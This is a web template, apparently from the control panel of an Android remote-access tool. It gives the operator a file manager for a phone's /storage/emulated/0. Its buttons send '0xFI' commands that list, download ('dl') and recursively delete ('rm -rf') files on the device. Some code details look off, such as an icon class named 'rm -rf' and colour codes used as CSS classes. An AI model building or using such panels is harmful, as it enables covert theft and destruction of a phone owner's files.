<div class="ui segment">
    <div class="ui secondary menu">
        <div class="right menu">
            <button onclick="openDirectory(this, '/storage/emulated/0')" class="ui blue button dlop">
                <i class="icon home"></i>Home
            </button>
            <!-- Home = /storage/emulated/0 -->
        </div>
    </div>
    <table class="ui celled table">
        <thead>
            <tr>
                <th style="text-align: center" colspan="3">Files</th>
            </tr>
        </thead>
        <tbody>
            <% pageData.forEach((item) => { %>
            <tr>
                <td title="<%= item.path %>"><%= item.name %></td>
                <td class="collapsing">
                    <% if(!item.isDir) { %>
                    <button class="ui button dlop" onclick="downloadFile(this, '<%= item.path %>')">
                        &nbsp;&nbsp;&nbsp;<i class="icon download blue"></i>
                    </button>
                    <% } else { %>
                    <button class="ui button dlop" onclick="openDirectory(this, '<%= item.path %>')">
                        &nbsp;&nbsp;&nbsp;<i class="icon folder open grey"></i>
                    </button>
                    <% } %>
                </td>
                <td class="collapsing">
                    <button class="ui red button" onclick="deleteFile('<%= item.path %>')">
                        &nbsp;&nbsp;&nbsp;<i class="icon rm -rf"></i>
                    </button>
                </td>
            </tr>
            <% }) %>
        </tbody>
    </table>

    <script>
        function openDirectory(element, path) {
            $(element).children().css("opacity", "0");
            $(element).addClass('blue loading');
            $('.dlop').addClass('disabled');
            sendCommand('0xFI', {
                action: 'ls',
                path
            }, (error, message) => {
                if (error) {
                    showNotification('#f03434', error);
                    $(element).children().css("opacity", "1");
                    $(element).removeClass('blue loading');
                } else if (message === 'Requested') {
                    showNotification('#2ecc71', 'Requesting Files, Please Wait');
                    setTimeout(() => {
                        location.reload();
                    }, 500);
                }
            });
        }

        function downloadFile(element, path) {
            $(element).children().css("opacity", "0");
            $(element).addClass('green loading');
            $('.dlop').addClass('disabled');
            sendCommand('0xFI', {
                action: 'dl',
                path
            }, (error, message) => {
                if (error) {
                    showNotification('#f03434', error);
                    $(element).children().css("opacity", "1");
                    $(element).removeClass('green loading');
                } else if (message === 'Requested') {
                    setTimeout(() => {
                        $(element).children().css("opacity", "1");
                        $(element).removeClass('green loading');
                        $('.dlop').removeClass('disabled');
                        showNotification('#2ecc71', 'Downloading File, It will be available in `Downloads` Soon');
                    }, 300);
                }
            });
        }

        function deleteFile(path) {
            if (confirm('Are you sure you want to delete this file?')) {
                sendCommand('0xFI', {
                    action: 'rm -rf',
                    path
                }, (error, message) => {
                    if (error) {
                        showNotification('#f03434', error);
                    } else {
                        showNotification('#2ecc71', 'File deleted successfully');
                        setTimeout(() => {
                            location.reload();
                        }, 500);
                    }
                });
            }
        }

        function sendCommand(command, params, callback) {
            $.ajax({
                url: '/api/command',
                type: 'POST',
                data: JSON.stringify({ command, params }),
                contentType: 'application/json; charset=utf-8',
                dataType: 'json',
                success: (response) => {
                    callback(null, response.message);
                },
                error: (xhr, status, error) => {
                    callback(error, null);
                }
            });
        }

        function showNotification(color, message) {
            $('body').append(`
                <div class="ui ${color} message">
                    <i class="close icon"></i>
                    <div class="header">
                        ${message}
                    </div>
                </div>
            `);
            $('.ui.message').transition('fade up');
            setTimeout(() => {
                $('.ui.message').transition('fade up');
            }, 3000);
        }
    </script>
</div>
